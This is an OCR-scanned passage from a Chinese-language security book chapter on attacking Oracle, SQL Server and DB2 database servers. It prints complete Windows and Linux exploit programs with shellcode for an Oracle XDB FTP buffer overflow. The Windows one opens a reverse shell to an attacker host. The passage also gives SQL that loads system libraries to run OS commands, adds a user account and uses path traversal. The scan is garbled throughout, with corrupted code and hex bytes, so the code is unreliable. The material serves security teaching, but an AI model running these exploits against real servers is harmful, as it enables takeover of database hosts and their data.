可 能 知道 你 的 破解 在 实际 环境 中 为 什么 不 能 工作 。 


(D Fire-and-forget 来 源 于 军事 术语 ， 其 含义 是 指 某 些 武器 〈 比 如 一 些 导 弹 ) 被 发 射出 去 之 后 就 能 够 自行 攻击 目标 ， 发 
射 者 无 需 再 进行 控制 。 一 一 译 者 注 
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«L^ 把 数据 库 服务 器 和 Web 服 务 器 做 比较 时 ， 会 惊讶 地 发 现 Web 服 务 器 比 数据 库 服务 器 要 
安全 得 多 。 这 不 只 是 功能 多 少 的 问题 ， 而 是 因为 Web 服 务 器 一 般 挂 在 互联 网 上 ， 而 数 

据 库 服务 器 却 常常 隐藏 在 内 网 的 防火 墙 后 面 。 奇 怪 的 是 ， 用 户 通常 要 求 保 证 Web 服 务 器 的 安全 ， 
却 不 把 数据 库 的 安全 放 在 心 上 。 在 读 完 本 章 之 后 ， 我 们 希望 你 能 认可 这 种 观点 : 数据 库 管理 员 
(DBA) 应 该 对 性 能 关注 少 一 点 ， 把 工作 的 重心 放 在 保护 虚拟 财产 一 一 数据 上 。 只 有 当 我 们 强烈 
要 求 时 ， 厂 商 才 会 提供 更 安全 的 数据 库 服务 器 软件 。 

凭 心 而 论 ， 没有 哪个 厂商 比 其 他 的 厂商 做 得 更 出 色 。 但 在 刚刚 过 去 的 日 子 里 , 我 们 欣慰 地 看 
到 RDBMS 领 域 中 举足轻重 的 巨头 们 已 经 积极 行动 起 来 ， 并 做 出 前 脆性 的 姿态 来 应 对 安全 问题 。 
虽然 做 得 还 不 够 ， 但 我 们 正在 沿 着 正确 的 方向 前 进 。 因 此 ， 不 要 再 纸上谈兵 了 ， 要 研究 攻击 者 获 
取 数 据 库 服务 器 控制 的 方法 ， 只 有 了 解 了 这 些 方法 ，DBA 才 能 设计 、 执 行 更 全 面 的 防御 策略 。 

数据 库 服 务 器 用 结构 化 的 方式 存储 数据 ， 以 表 的 形式 集合 相关 的 数据 ， 用 SQL (Structured 
Query Language， 结 构 化 查询 语言 ) 查询 、 更 新 、 删 除数 据 。 除 了 这 些 标准 的 功能 外 ， 各 大 数据 
库 厂商 还 提供 了 一 些 额外 的 功能 ， 例 如 扩展 标准 的 SQL 〈 微 软 SQL Server 上 的 Transact-SQL 或 
T-SQL，Oracle 上 的 Procedural Language / SQL 或 PL/SQL ) 函数 、 扩 展 存储 过 程 等 。 但 是 ， 数 据 库 
服务 器 的 漏洞 大 都 出 现在 这 些 区 域 里 。 功 能 和 安全 是 成 反比 的 ， 当 软件 的 功能 越 多 ， 软 件 就 会 变 
得 越 脆 弱 。 

攻击 数据 库 服 务 器 软件 应 该 着 眼 于 网 络 层 或 应 用 层 。 在 网 络 层 需 要 处 理 低级 的 问题 , 在 应 用 
层 通 常 要 处 理 SQL。 在 本 章 ， 我 们 关注 微软 的 SQL Server、Oracle 的 RDBMS 和 IBM 的 DB2。 


24.1 网 络 层 攻 击 


大 部 分 网 络 层 攻击 主要 是 利用 溢出 进行 的 。 在 过 去 ，Oracle 和 微软 的 RDBMS 软 件 在 网 络 层 

在 Oracle 的 登录 过 程 中 ， 如 果 提 交 超 长 的 用 户 名 ,会 引起 栈 游 出 ， 从 而 允许 攻击 者 完全 获取 
系统 的 控制 权 。 这 个 漏洞 由 NGSSoftware 的 Mark Litchfiled 发 现 ，Oracle 在 2003 年 4 月 修复 了 这 个 漏 
W] Chttp://otn.oracle.com/deploy/security/pdf/2003alert51.pdf) . 

微软 的 SQL Server 也 出 现 过 栈 缓 冲 区 溢出 漏洞 ， 客 户 端 发 送 的 第 一 个 异常 数据 包 【〈 应 该 只 包 
含 MSSQLServer 的 特征 ) 就 能 触发 它 ， 并 借 此 获取 控制 。 它 由 Dave Aite 发 现 ， 并 命名 为 Hello bug. 
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微软 在 2002 年 9 月 修复 了 这 个 bug Chttp://www.microsoft.com/technet/security/Bulletin/MS02-05 6.mspx). 

当 提 到 在 网 络 层 破解 漏洞 时 ， 你 不 能 只 依靠 用 于 协议 封装 的 客户 端 工具 ， 而 需要 自己 动手 编 
写 代 码 。 编 号 这 些 代码 需要 分 析 实 际 使 用 的 协议 。 你 需要 抓 包 工具 , 如 NGSSni 作 .Network Monitor. 
tcpdump 或 Wireshark， 并 会 使 用 这 些 数据 库 服务 器 软件 。 针 对 具体 的 网 络 层 问题 ， 有 两 个 方法 。 
一 是 包 的 转 储 ， 把 转 储 的 相关 数据 粘 到 破解 代码 里 ， 做 少量 修改 ， 把 它 发 送出 去 ， 二 是 为 讨论 中 
的 协议 编写 函数 库 。 第 一 个 方法 的 好 处 是 方便 快捷 ， 即 揪 即 用 ; 第 二 个 方法 需要 花 些 时 间 ， 但 一 
旦 写成 以 后 , 可 以 重复 利用 。 感谢 有 心 人 把 常见 的 协议 进行 了 归纳 分 析 , 帮 有 我 们 节省 了 很 多 时 间 。 
Brian Bruns 研 究 了 微软 的 Tabular Data Stream (TDS) 协议 ,可 以 在 www.freetds.org/tds.html 找 到 相 
关 文 档 。 

许多 数据 库 服务 器 允许 用 户 用 非 SQL 方 法 查询 它 保 存 的 数据 。 这 些 典型 的 非 SQL 方法 包括 其 
他 的 标准 协议 ， 如 HTTP 和 FTP。 

例如 ，Oracle 9 在 HTTP 上 提供 了 Oracle XML 数据 库 (XDB) 接口 ， 端 口 为 8080， 在 FTP 上 ， 
端口 为 2100。Oracle 9 在 默认 情况 下 安装 XDB, 而 XDB 的 Web 和 FTP 两 个 版 本 都 容易 受到 溢出 的 攻 
击 。 你 可 以 通过 提交 超 长 的 用 户 名 或 密码 来 溢出 Web 服 务 的 栈 缓冲 区 。 当 溢出 在 途中 改写 保存 的 
返回 地 址 时 ， 你 也 溢出 了 一 个 整数 变量 ， 然 后 它 作为 要 复制 的 字 节 数 传递 给 memcpy () 。 因 为 在 
游 出 字符 串 中 不 能 有 空 字 节 ， 所 以 我 们 可 以 设置 的 最 小 整数 是 0x01010101。 然 而 ， 这 还 是 太 大 
了 ， 从 而 导致 在 调用 memcpy 时 引起 访问 违例 或 段 违例 。 表 面 上 看 起 来 ， 在 诸如 Linux 之 类 的 平台 
上 几乎 不 可 能 破解 它 〈 说 “表面 上 ”是 因为 ， 你 从 来 都 不 应 该 说 从 来 不 ， 它 在 Linux 上 应 该 也 是 
可 以 被 利用 的 ， 只 是 我 们 现在 没有 时 间 来 验证 )。 然 而 ， 在 Windows 上 ， 我 们 可 以 改写 栈 上 的 
EXCEPTION_REGISTRATION 结 构 ， 利 用 它 获得 进程 执行 路 径 的 控制 权 。 

XDB 的 FTP 服 务 也 存在 类 似 的 问题 。 超 长 的 用 户 名 或 密码 将 导致 栈 游 出， 但 我 们 仍 有 与 Web 
服务 等 价 的、 相同 的 问题 。 也 就 是 说 ， 在 XDB 的 FTP 服 务 里 又 多 了 几 个 溢出 。XDB 的 FTP 服 务 除 
了 支持 大 多 数 标 准 的 FTP 命 令 外 , Oracle 又 增加 了 一 些 命令 。 其 中 的 两 个 命令 一 一 TEST 和 UNLOCK， 
存在 缓冲 区 溢出 问题 ， 在 所 有 的 平台 上 都 很 容易 被 利用 。 下 面 两 个 例子 ， 就 是 针对 Windows 和 
Linux 的 破解 代码 。 

Q Windows XDB 溢 出 破解 代码 


#include <stdio.h> 
#include «windows.h» 
#include <winsock.h> 





int GainControlOfOracle(char *, char *); 
int StartWinsock (void); 
int SetUpExploit (char *,int); 


struct sockaddr_in s_sa; 
struct hostent *he; 
unsigned int addr; 
char host[260]=""; 
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unsigned char exploit[508]- 
"\x55\x8B\XEC\XEB\x03\x5B\XEB\x05\xE8\xF8\XFF\XFF\XFF\XBE\XFF\XFF" 
“\XFF\XFF\X81\xF6\xDC\xXFE\XFF \xFF\x03 \XDE\x33 \xC0O\x50\x50\x50\x50" 
"\x50\x50\x50\x50\x50\x50\XFF\xD3\x50\x68\X61\xX72\x79\x41\x68\x4C" 
"\xK69\x62\x72\x68\xX4C\X6F\X61\x64\x54\xFF\K75\XFC\XFF\x55\xF4\x99" 
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13" 
"\x83\XEB\x01\xXE2\xF9\x43\x53\xPFF\X75\XFC\KPP\X55\xXP4\x89\x45\xKEC" 
"\x83\xC3\x10\x53\XFF\X75\XFC\XFF\X55\xF4\x89\x45\xE8\x83\xC3\x0C" 
"\*53\XPP\x55\xXPO\X89\x45\xP8\x83\xC3\x0C\X53\x50\xFF\x55\xF4\x89" 
"\x45\xH4\x83\xC3\x0C\x53\xFF\x75\XF8\xFF\x55\xF4\x89\x45\xE0\x83" 
"\xC3\x0C\x53\xXPFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89" 
"\x5D\xD8 \x33\xD2\x66\x83\xC2\x02\x54\x%52\XFF\x55\xE4\x33\xC0\x33" 
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xDO\xBF\x0A" 
"\x01\x01\%26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66" 
"\x35\xXFF\XCA\xX66\x89\x45\xCA\x6A\x01\x6A\x02\xXFF\x55\xE0\x89\x45" 
"\xEO\x6A\x10\x8D\x75\xC8\x56\x8B\xX5D\xE0\x53\xXFF\x55\xDC\x83\xc0" 
"\x44\x89\x85\x58\XFF\XFF \xFF\x83\xC0\x5E\x83 \xCO\x5E\x89\x45\x84" 
"\x89\X5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xXBD\x48\xFF\XFF\XFF\x57" 
"\xX8D\XBD\x58\XFF\XFF\XFF\xX57\x33\xXCO\x50\x50\x50\x83\xC0O\x01\x50" 
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53 \x50\xFF\x55\xEC\xXFF\x55\xE8" 
"\x60\*33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD" 
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03" 
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48" 
"\x24\x5A\%52\x8B\XFA\X03 \xX3E\xX81\X3F\X47\X65\X74\x50\x74\x08\x83" 
"\xC6\x04\x83\xC1\x02\xEB\xXEC\x83\xC7\x04\x81\x3F\x72\x6F\X63\x41" 
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9 \x8B\xFA\x0F\xB7\x01\x03" 
"\x3C\X83\x89\K7C\x24\x44\x8B\x3C\K24\X89\X7C\X24\ x4C\X5F\X61\xC3" 
"\x90\x90\x90\XBC\x8D\x9A\x9E\x8B\X9A\XAF\xX8D\x90\x9C\X9A\X8C\X8C" 
"\xBE\XPFF\XFF\XBA\K87 \x96\x8B\XAB\X97\X8D\X9A\X9E\x9B\XFF\XFF\XAB" 
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\XFF\XFF\xXA8\xAC\xXBE\XAC\x8B" 
"\x9E\x8D\x8B\x8A\xX8F\XFF\xFF\XA8 \XAC\XBE\xXAC\x90\x9C\x94\x9A\x8B" 
"\xXBE\XFFA\XFP\X9C\xX90\x91\x91\x9A\X9C\X8B\XFF\xX9C\x92\x9B\XFF\XFF" 
"\XFF\XFF\XFF\XFF"; 


char exploit code[8000]-2 


"nooooppppqqagdrrrrssssttttuuuuvvvvwwWWXXXXyVyyzZzZZAAAAAABBBBCCCCD" 
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQOQQRRRRSSSST" 
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK" 
"LMNOPQRSTUVWXYZ20000999988887777666655554444333322221111098765432" 
"laaaabbbbcc"; 


char exception handler[8]2"Nx79Xx9BAx£7Nx77" ; 


char short_jump[8]="\xEB\x06\x90VK90"; 


int main(int argc, char *argv[]) 
( 
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if(argc != 6) 

{ 
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); 
printf("\n\t\tfor Blackhat (http: //www.blackhat.com)"); 
print£("\n\n\tSpawns a reverse shell to specified port"); 
printf ("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]); 
printf ("\n\n\tDavid Litchfield\n\t (davidéngssoftware.com)"); 
printf("\n\t6th July 2003\n\n\n"); 


return 0; 


strncpy (host, argv[1],250); 
if(StartWinsock()--0) 
return printf("Error starting Winsock. An"); 


SetUpExploit(argv[4],atoi(argv[5])); 


strcat(exploit code,short jump); 
Strcat(exploit code,exception handler); 
strcat(exploit code,exploit); 
strcat(exploit, code, "\r\n"); 


GainControlOfOracle(argv[2],argv[3]); 


return 0; 


int SetUpExploit(char *myip, int myport) 
( 

unsigned int ip-0; 

unsigned short prt=0; 

char *ipt=""; 

char *prtt-""; 


ip = inet, addr (myip); 





ipt - (char*)&ip; 

exploit[191]-ipt[0]; 
exploit[192]-ipt[1]; 
exploit[193]-ipt[2]; 
exploit[194]-ipt[3]; 


// set the TCP port to connect on 
// netcat should be listening on this port 


// e.g. nc -1 -p 80 


prt - htons((unsigned short)myport); 
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prt = prt ^ OxFFFF; 

prtt = (char *) &prt; 
exploit[209]=prtt[0]; 
exploit[210]-prtt[1]; 


return 0; 
} 
int StartWinsock() 
{ 
int err=0; 
WORD wVersionRequested; 
WSADATA wsaData; 


wVersionRequested = MAKEWORD( 2, 0 ); 
err = WSAStartup( wVersionRequested, &wsaData ); 


if ( err != 0) 
return 0; 
if ( LOBYTE( wsaData.wVersion ) !- 2 || HIBYTE( wsaData.wVersion ) != 0) 
[ 
WSACleanup( ); 
return 0; 


if (isalpha(host[0])) 
{ 
he = gethostbyname (host); 
s_Sa.sin_addr.s_addr=INADDR_ANY; 
S Sa.Sin family-AF INET; 
memcpy(&s sa.sin addr,he-»h addr,he-»h, length); 


else 


addr = inet addr(host); 
S Sa.sin addr.s addr-INADDR ANY; 
S sa.Sin family-AF INET; 
memcpy(&s sa.sin  addr,&addr,4); 


he - (struct hostent *)1; 
) 
if (he == NULL) 
{ 
return 0; 


} 


return 1; 
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int GainControlOfOracle(char *user, char *pass) 
{ 


char usercmd[260]-"user "; 
char passcmd[260]-"pass "; 
char resp[1600]=""; 

int snd=0,rcev=0; 

struct sockaddr in r addr; 
SOCKET sock; 

strncat (usercmd, user, 230); 


strcat (usercmd, "\r\n") ; 
strncat (passcmd, pass, 230); 
strcat (passemd, "\r\n"); 


sock=socket (AF_INET, SOCK_STREAM, 0); 
if (sock==INVALID_SOCKET) 
return printf(" sock error"); 


r addr.sin family-AF INET; 

r addr.sin addr.s addr-INADDR ANY; 

r addr.sin port-htons((unsigned short)0); 
s_sa.sin_port=htons( (unsigned short) 2100); 


if (connect (sock, (LPSOCKADDR) &s, sa, sizeof(s sa))--SOCKET ERROR) 
return printf("Connect error"); 


rcv = recv(sock,resp,1500,0); 
printf("%s",resp); 
ZeroMemory(resp,1600); 


snd-send(sock, usercmd , strlen(usercmd) , 0); 
rcv - recv(sock,resp,1500,0); 
printf("$s",resp); 

ZeroMemory(resp,1600); 





snd=send(sock, passcmd , strlen(passcmd) , 0); 
rcv - recv(sock,resp,1500,0); 
printf ("%s", resp); 
if(resp[0]=='5') 
{ 
closesocket (sock); 
return printf("Failed to log in using user %s and password 
és.\n",user,pass); 
} 
ZeroMemory (resp, 1600); 


snd=send(sock, exploit_code, Strlen(exploit code) , 0); 
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Sleep (2000); 


closesocket (sock) ; 
return 0; 


} 


D Linux XDB 溢 出 破解 代码 


#include <stdio.h> 
#include <sys/types.h> 
#include «sys/socket.h» 
#include «netinet/in.h» 
#include <arpa/inet.h> 
#include «netdb.h» 


int main(int argc, char *argv[]) 
{ 


struct hostent *he; 
struct sockaddr_in sa; 
int sock; 

unsigned int addr = 0; 
char recvbuffer[512]=""; 
char user[260]="user "; 
char passwd[260]-"pass "; 
int rev=0; 

int snd -0; 

int count - 0; 


unsigned char nop_sled[1804]=""; 
unsigned char saved_return_address[]="\x41\xc8\xff\xbE£"; 
unsigned char exploit[2100]="unlock / AAAABBBBCCCCDDDDEE" 
"EEFFFFGGGGHHHHIIIIJJJJKKKK" 
"LLLLMMMMNNNNOOOOPPPPOQQQ'" 
"ORRRRSSSSTTTTUUUUVVVVWWNW " 


"WXXXXYYYYZZZZaaaabbbbccccdd"; 


unsigned char 
code []="\x31\xdb\x53\x43\x53\x43\x53\x4b\x6a\x66\x58\x54\x59\xcd" 


"\x80\x50\x4b\x53\x53\x*53\x66\x68\x41\x41\x43\x43\x66\x53" 
"\x54\x59\x6a\x10\x51\x50\x54\x59\x6a\x66\x58\xcd\x80\x58" 
"\x6a\x05\*%50\x54\x59\x6a\x66\x58\x43\x43\xcd\x80\x58\x83" 


"\xec\x10\x54\x5a\x54\x52\*50\x54\x59\x6a\x66\x58\x43\xcd" 
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"\x80\x50\x31\xc9\x5b\x6a\x3£\x58\xcd\x80\x41\x6a\x3f\x58" 
"\xcd\x80\x41\x6a\x3£\x58\xcd\x80\x6a\x0b\x58\x99\x52\x68" 
"\x6e\x2£\x73\x68\x68\x2£\k2£\x62\x69\x54\x5b\x52\x53\x54" 

"\x59\xcd\x80\r\n"; 


if(argc !-4) 

{ 
print£("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); 
printf("\n\t\tfor Blackhat (http://www.blackhat.com)"); 
printf("\n\n\tSpawns a shell listening on TCP Port 16705"); 
printf ("\n\n\tUsage:\t%s host userid password",argv[0]); 
printf("\n\n\tDavid Litchfield\n\t (davidengssoftware.com)"); 

printf ("\n\t7th July 2003\n\n\n"); 

return Q; 


while(count < 1800) 


{ 
nop_sled[count++]=0x90; 


// Build the exploit 
Strcat(exploit,saved return address); 
strcat(exploit,nop sled); 
strcat(exploit,code); 


// Process arguments 
strncat(user,argv[2],240); 
strncat (passwd,argv[3],240); 
strcat (user, "\r\n"); 

strcat (passwd, "\r\n"); 


// Setup socket stuff 
sa.sin_addr.s_addr=INADDR_ANY; 
sa.sin_family = AF_INET; 





sa.sin_port = htons((unsigned short) 2100); 


// Resolve the target system 
if (isalpha(argv[1] [0])==0) 


addr = inet addr(argv[11); 
memcpy (&sa.sin_addr, &addr,4); 


else 


he = gethostbyname (argv[1]); 
if(he == NULL) 
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return printf("Couldn't resolve host %s\n",argv(1]); 
memcpy(&sa.sin addr,he-»h addr,he-»h, length); 


sock = socket (AF_INET, SOCK_STREAM, 0); 
if(sock < 0) 

return printf("socket() failed.\n"); 
if(connect (sock, (struct sockaddr *) &sa,sizeof(sa)) < 0) 
{ 

close (sock); 

return printf ("connect() failed.\n"); 


printf ("\nConnected to %s....\n",argv[1]); 


// Receive and print banner 
rev = recv(sock, recvbuffer,508,0); 
if(rev > 0) 
{ 
printf("$sWMn",recvbuffer); 
bzero (recvbuffer, rev+1) ; 


else 


close (sock); 
return printf("Problem with recv()\n"); 


// send user command 
snd = send(sock,user,strlen(user),0); 
if(snd != strlen(user)) 
{ close(sock); 
return printf("Problem with send()....\n"); 


else 


printf("$€s",user); 


// Receive response. Response code should be 331 
rcv - recv(sock,recvbuffer,508,0); 
if(rev > 0) 


[ 


if(recvbuffer[0]--20x33 && recvbuffer[1]--20x33 && recvbuffer[2]==0x31) 
{ 

printf ("%s\n",recvbuffer); 

bzero(recvbuffer,rcv-*1); 
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else 


close(sock) ; 
return printf("FTP response code was not 331.\n"); 


else 


close(sock); 
return printf ("Problem with recv()\n"); 


// Send pass command 
snd = send(sock, passwd, strlen {passwā), 0); 
if(snd != strlen(user)) 
{ 
close(sock) ; 
return printf("Problem with send()....\n"); 
} 
else 
printf ("%s",passwd) ; 


// Receive response. If not 230 login has failed. 
rev = recv(sock, recvbuffer,508,0); 

if(rcv > 0) 

{ 


if (recvbuffer[0]==0x32 && recvbuffer[1]==0x33 && recvbuffer [2]==0x30) 


{ 
print£("%s\n",recvbuffer) ; 
bzero(recvbuffer,rcv41); 


else 


close(sock); 


return printf("FTP response code was not 230. Login failed...\n"); 


else 


close(sock}; 
return printf ("Problem with recv()\n"); 


// Send the UNLOCK command with exploit 
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snd = send(sock,exploit,strlen(exploit),0); 
if(snd != strlen(exploit)) 
{ . 
close(sock); 
return printf("Problem with send()....Mn"); 
} 
// Should receive a 550 error response. 
rev = recv(sock, recvbuffer,508,0); 
if(rcv > 0) 
printf("$sWMn",recvbuffer); 
printf ("\n\nExploit code sent....\n\nNow telnet to $s 16705\n\n",argv[1]); 
close(sock); 


return 0; 


} 

当 Oracle 通 过 HTTP 和 FTP 提 供 数据 库 服 务 时 ，IBM 也 不 甘 示 弱 ， 他 们 的 DB2 在 TCP 端 口 6789 
上 提供 JDBC Applet Server。 由 于 有 这 个 Applet Server， 用 户 可 以 通过 浏览 器 下 载 并 执行 Java 
Applet， 进 而 查询 数据 库 服务 器 。 这 个 从 Web 服 务 器 下 载 的 Java Applet 将 连接 到 Applet Server, Jf 
把 用 户 的 请 求 传递 给 数据 库 服 务 器 。 这 个 过 程 中 有 一 个 明显 的 风险 一 一 源 自 客户 端的 查询 。 因 为 
可 以 把 查询 硬 编码 到 一 个 什么 也 没有 的 applet 中 ， 攻 击 者 可 以 完全 发 送 他 们 自己 的 查询 。JDBC 
Applet Server 把 这 个 请 求 转发 给 数据 库 服 务 器 ， 然 后 传 回 结果 。 不 用 说 ， 这 个 功能 似乎 非常 危险 ， 
应 该 谨慎 使 用 。 

当然 ， 微 软 也 不 例外 。 微 软 的 SQL 在 2003 年 出 现 了 Slammer 漏 洞 。Slammer 是 一 个 栈 缓冲 区 
溢出 漏洞 ， 当 向 SQL Server 1434 端 口 发 送 第 一 个 字 节 是 0x04、 后 面 跟着 超 长 字符 串 的 UDP 包 时 ， 
将 触发 溢出 。 关 于 这 个 漏洞 的 破解 有 很 多 文章 ， 你 可 以 在 网 上 及 本 书 中 找到 相关 的 信息 。 
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在 应 用 层 有 两 类 攻击 。 第 一 类 包括 为 了 运行 操作 系统 命令 ， 简 单 地 破解 暴露 的 功能 性 
(functionality); 第 二 类 包括 对 功能 性 内 缓冲 区 溢出 问题 的 利用 。 任 何 一 个 方法 ， 用 SQL (或 者 
T-SQL、PL/SQL) 编写 的 破解 代码 都 可 以 通过 标准 的 SQL 客 户 端 工 具 执 行 。 由 于 SQL 和 SQL 扩 展 
部 分 等 同 于 程序 设计 语言 ， 因 此 ， 你 可 以 在 多 种 方法 里 通过 编码 来 隐藏 攻击 行为 。 如 果 我 们 使 用 . 
了 上 述 技术 ， 而 目标 程序 仅 在 应 用 层 进行 检查 ， 那 么 目标 程序 的 自我 防御 甚至 检测 都 很 难 奏 效 。 
在 我 的 经 验 里 ， 可 怜 的 入 侵 检测 系统 (Intrusion Detection System，IDS)， 甚 至 包括 入 侵 防 护 系统 
(Intrusion Prevention System, IPS) 都 不 会 查 觉 到 有 什么 异常 。 看 一 个 简单 的 例子 ， 考 虑 这 种 情 
形 : 在 真正 执行 攻击 前 ， 攻 击 者 把 破解 代码 编码 后 插入 表 里 。 然 后 ， 或 许 是 在 数 星 期 后 ， 进 行 第 
二 次 查询 ， 把 破解 代码 载 入 变量 ， 然 后 执行 。 

查询 1: 


INSERT INTO TABLE1 (foo) VALUES ('EXPLOIT') 
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查询 2: | 
DECLARE @bar varchar (500) 
SELECT @bar = foo FROM TABLEL 
EXEC (@bar) 


你 可 能 会 说 ， 可 以 通过 动态 的 exec 来 识别 攻击 行为 。 的 确 可 以 这 样 做 ， 但 如 果 这 种 查询 属 
于 正常 的 使 用 范围 呢 ? 其 实 ， 很 难 分 辨 它 与 正常 查询 之 间 的 区 别 。 到 目前 为 止 ， 保 护 数据 库 服务 
器 的 最 好 方法 不 是 紧 果 着 IPSAIDS 不 放 ， 而 是 花 时 间 认 真 锁定 Clocking down) 服务 器 。 
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当 用 户 有 适当 的 权限 时 (没有 权限 很 正常 ), 大 多 数 RDBMS 都 会 多 许 他 们 执行 操作 系统 命令 。 
AAW? 当然 有 很 多 理由 《微软 SQL Server 的 安全 更 新 通常 需要 这 个 功能 ， 下 面 会 讨论 这 个 问 
题 )， 但 我 们 认为 ， 让 这 些 功能 原封 不 动 地 待 在 那里 是 很 危险 的 。 你 可 以 通过 RDBMS 软 件 运行 操 
作 系统 命令 ， 但 方法 不 太一 样 ， 主 要 是 看 你 用 哪 一 家 的 产品 了 。 


24.3.1 微软 SQL Server 


即使 你 不 太 了 解 微软 的 SQL Server， 可 能 也 听 说 过 扩展 存储 过 程 xp_cmdashel1。 一 般 来 说 ， 
只 人 允许 系统 管理 员 权 限 的 用 户 运 行 xp_cmdqsheI1， 但 在 过 去 的 几 年 里 ， 暴 露 的 一 些 漏洞 允许 低 权 
限 用 户 也 可 以 使 用 它 。xp_cmdshel1 获 得 一 个 参数 一 一 要 执行 的 命令 。 典 型 的 是 用 运行 SQL 服 务 
器 账户 (通常 是 LOCAL SYSTEM 账 户 〉 的 安全 上 下 文 (security context) 执行 这 条 命令 。 在 某 些 情 
况 下 ， 可 以 设置 一 个 代理 账号 ， 然 后 在 这 个 账号 的 安全 上 下 文 里 执行 这 条 命令 。 

exec master..xp_cmdshell ('dir > ¢:\foo.txt') 

尽管 很 多 安全 更 新 都 要 用 到 xp_cmdshel1l, 但 把 xp_cmdshel1l 留 在 原 地 ， 通常 会 危及 SQL 服 
务 器 的 安全 。 比 较 好 的 做 法 是 删除 这 个 扩展 存储 过 程 ， 并 把 xplog70 .9411 从 pinn 目 录 里 移 走 。 在 
需要 更 新 时 ， 再 把 xplog70.911 移 回 binn 目 录 ， 重 新 加 上 xp_cmdshell。 


24.3.2 Oracle 

在 Oracle 里 有 两 种 方法 可 以 运行 操作 系统 命令 ， 但 都 不 是 现成 的 方法 ， 这 里 只 有 人 允许 命令 执 
行 的 框架 。 一 种 方法 是 用 PL/SQL 存 储 过 程 。PL/SQL 可 以 被 扩展 ， 从 而 允许 一 个 过 程 调用 操作 系 
统 函数 库 输出 的 函数 。 因 为 这 个 原因 , 攻击 者 可 以 用 Oracle 加 载 C 运 行 时 库 (msvcrt .a11 或 libc)， 
执行 system() C 函 数 。 这 个 函数 像 下 面 这 样 运行 命令 。 

CREATE OR REPLACE LIBRARY exec_shell 

AS 'C: WwinntNsystem32Wnsvcrt.dll^; 

/ 

Show errors 

CREATE OR REPLACE PACKAGE oracmd IS 

PROCEDURE exec (cmdstring IN CHAR); 

end oracmd; 


/ 
show errors 
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CREATE OR REPLACE PACKAGE BODY oracmd IS 

PROCEDURE exec(cmdstring IN CHAR) 

IS EXTERNAL 

NAME "system" 

LIBRARY exec_shell 

LANGUAGE C; 

end oracmd; 

/ 

exec oracmd.exec ('net user ngssoftware password!! /add'); 


为 了 建立 这 样 的 过 程 ， 用 户 账户 必须 共有 CREAT/ALTER (ANY) LIBRARY 权 限 。 
在 最 近 一 些 Oracle 版 本 里 ， 可 以 把 加 载 函 数 库 的 目录 限制 为 $10RACLE_HOME}\bin 目 录 。 这 
在 一 定 程度 上 提高 了 安全 性 ， 然 而 ， 通 过 双 点 (double-dot) 法 ， 你 可 以 摆脱 这 层 束缚 ， 从 而 加 


载 任何 函数 库 。 
CREATE OR REPLACE LIBRARY exec_shell 
AS '..\..\..\..\..\..\winnt\system32\msvert.dll'; 
当然 ， 上 面 的 命令 是 Windows 下 的 例子 ， 如 果 我 们 想 在 类 UNIX 系 统 上 执行 这 样 的 攻击 ， 则 
要 把 库 名 称 改 为 libe 的 路 径 。 


注意 ， 在 某 些 版 本 的 Oracle 里 ， 甚 至 在 不 接触 主 RDBMS 服 务 的 情况 下 ， 也 有 可 能 哄骗 软件 
运行 OS 命 令 。 当 Oracle 加 载 函 数 库 时 ， 它 会 连 到 TNS Listener，Listener 执 行 小 主机 程序 〈 名 为 
extproc) 做 真正 的 库 函 数 加 载 和 函数 调用 。 通 过 直接 和 TNS Listener 通 信 ， 就 有 可 能 哄骗 它 执 
行 extproc。 因 此 ， 攻 击 者 在 没有 用 户 ID 或 密码 的 情况 下 ， 仍 能 获得 Oracle 服 务 器 的 控制 。 这 个 
漏洞 已 经 被 补 上 了 。 


24.3.3 IBM DB2 


IBM 的 DB2 和 Oracle 一 样 不 安全 ， 但 具体 表现 不 同 。 几 乎 和 Oracle 一 样 ， 在 DB2 里 ， 你 也 可 以 
通过 创建 一 个 过 程 来 执行 操作 系统 命令 ， 但 在 默认 情况 下 ， 似 乎 任何 用 户 都 可 以 这 样 做 。 当 第 一 
次 安装 DB2 时 ，PUBLIC 默 认 是 IMPLICIT_ScHEMA 权 限 ， 这 种 权限 允许 用 户 创建 新 计划 (schema). 
这 个 计划 属于 syYsIBM， 但 PUBLIC 被 赋 于 在 它 内 部 创建 对 象 的 权力 。 同 样 ， 低 权限 用 户 也 可 以 创 
建新 计划 ， 并 在 它 里 面 创建 过 程 。 

CREATE PROCEDURE rootdb2 (IN cmd varchar (200)) 

EXTERNAL NAME 'c:\winnt\system32\msvert!system' 

LANGUAGE C 

DETERMINISTIC 


PARAMETER STYLE DB2SQL 
call rootdb2 ('dir > c:Mdb2.txt') 


为 了 防止 低 权 限 用 户 利 用 这 个 漏洞 ， 必 须 把 PUBLIC 的 TIMPLICIT_SsScHEMA 权 限 移 走 。 

为 了 减轻 管理 负担 ，DB2 还 提供 了 另外 的 机 制 ， 不 需要 通过 SQL 就 能 运行 操作 系统 的 命令 。 
这 个 功能 主要 是 由 DB2 的 远程 命令 服务 器 (Remote Command Server) 实现 的 ， 像 名 字 描 述 的 那 
样 , 它 的 功能 是 远程 执行 命令 。 以 Windows 平 台 为 例 ，db2rcmd . exe 启动 后 打开 名 为 DB2REMOTECMD 
